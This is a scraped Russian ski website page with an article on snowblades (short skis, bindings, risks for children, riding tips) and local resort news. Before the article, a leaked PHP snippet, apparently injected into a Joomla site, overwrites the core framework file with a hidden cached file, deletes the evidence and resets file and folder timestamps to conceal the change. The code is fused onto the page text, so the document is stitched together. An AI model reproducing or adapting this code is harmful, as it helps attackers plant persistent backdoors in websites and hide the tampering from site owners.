$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Сноублейды | Это интересно!
Баннер

Сноублейды

Не так давно на наших склонах начали появляться весёлые лыжи - сноублейды. Их главная особенность - это малая длинна, до одного метра. Со стороны они кажутся детскими лыжами.

Итак что это за зверь такой, сноублейды?

Сначала немного истории. В конце 80х годов на рынке появились новые ботинки Polsport Crosno. Их основание было несколько длинней чем у обычных и комуто пришла в голову мысль, что на них можно прокатиться и без лыж! Острые рёбра в сочетании с гладкой подошвой неплохо врезались в склон. Очень забавна была та лёгкость, с которой вращаются ноги. Странно что никому не пришла эта мысль раньше. И только в конце прошлого века в массы пришли сноублейды (название данное им с лёгкой руки Salamon "Snow Blade")


Такие лыжи малочувствительны к весу спортсмена, крепления позволяют быстро установить на них любые жесткие ботинки. Существуют также специальные облегчённые ботинки для сноублейдов. К сожалению в наших магазинах это досихпор большая редкость. Поэтому большинство лыжников используют обычные горнолыжные ботинки. Они позволяют хорошо контролировать кант на жестских склонах.
Многие используют новый снаряд для разнообразия на маленькой горке в дополнение к нормальным рыжам.

Есть несколько особенностей катания на сноублейдах:
1. Крепления жестко фиксируют ногу и при нагрузках не отстёгиваються как на обычных лыжах.  Кувыркаться после падения приходиться вместе с лыжами. Но если для взрослого человека это как тапочки, то для ребёнка это жесткие карвинговые лыжи. Скручивающие перегрузки очень опасны для ростущего организма. Особенно на буграх и мягком склоне. Поэтому детям лучше подойдут обычные лыжные крепления.
2. Старые ботинки не рассчитаны на крепления сноублейдов. Нередки случаи когда носки ботинок не выдерживали и отламывались в самый неподходящий момент. Новым же моделям такие нагрузки не страшны.

Блейды подтверждают карвинговое правило: короче лыжи - больше горка. И действительно такие лыжи обостряют ощущение даже на небольшой горке.
Одна пара таких лыж может послужить всему семейству! Для мледшего поколения - это будут основные лыжи, заядлому бордеру даст почувствовать свободу передвижения, маме наконецто почувствовать лёгкость поворота а отцу семейства, который неперый год ведёт борьбу с двухметровыми лыжами, подарит море новых ощущений.
С учётом таких возможностей и сравнительно невысокой цены комплекта - это действительно интересный снаряд для зимнего отдыха.

Первое впечатление это необыкновенная лёгкость на ногах, в рюкзаке, в управлении. На укатанном снегу блейды разгоняются моментально, толкая тебя к новым свершениям.  Ну таких лыжах хочеться носится по склону, крутиться , прыгать и просто валять дурака.

Но блейды это не только весёлая игрушка, это ещё и жесткий карвинговый снаряд. Они позволяют легко резать крутые дуги как на укатанном снегу, так и на льду! Конечно, короткие лыжи потребуют от вас хорошего равновесия, но это не одноколёсный велосипед. И не слушайте страшилки про то что блейдисты ходят с вечно отбитыми коленками и попами. Хорошо упасть можно разве что если сильно увлечься катанием в задней стойке. Рано или поздно пятая точка жестко повстречаеться со склоном. Но ничего страшного, главное не медлить и подобрать ноги под себя и вот вы опять на ногах.

Обязательно попробуйте блейды, это очень весело! Можно крутиться, прыгать , дурачится, круто резать склон! Не бойтесь экспериментировать!!!

Коментарии:

 
.

Последние новости

Популярные статьи

Новости
Открытие сезона на ГЛЦ "Царевщина"

Ну вот и дождались любители горных лыж и сноуборда открытия ГЛЦ "Царевщина". Сегодня был полноценный рабочий день на этом комплексе. Снегу накидали достаточно, земли нигде не видно. В некоторых местах есть лёд. Народу немного, на подъёмнике очередей нет. Цены остались на уровне прошлого сезона: 1 смена с 10 до 15 - 600р, 2 смена с 13 до 17 - 700р, 3 смена с 17 до 21 - 300р (в выходные дни). В будние дни соответственно 250 - 300 - 200руб. Работает как всегда только центральная трасса.

 
Новости ГЛК Красная глинка

По заявлениям представителей ГЛК  Красная Глинка, что неподалёку от Самары, открытие намечено не 2 декабря, в настоящее время активно идёт подготовка склонов. На Юге убрали не работающий подъемник, трасса стала шире. Сейчас снежат Восточный склон. К открытию скорее всего будут работать Центр, Восток и если успеют то и Юг.

 
Появился новый раздел "Народный магазин"
Подробнее ...
Сноублейды | Это интересно!

Как доехать на машине
*От:
*До:
Дай +1 :)
Сохранить в моб...
Яндекс.Метрика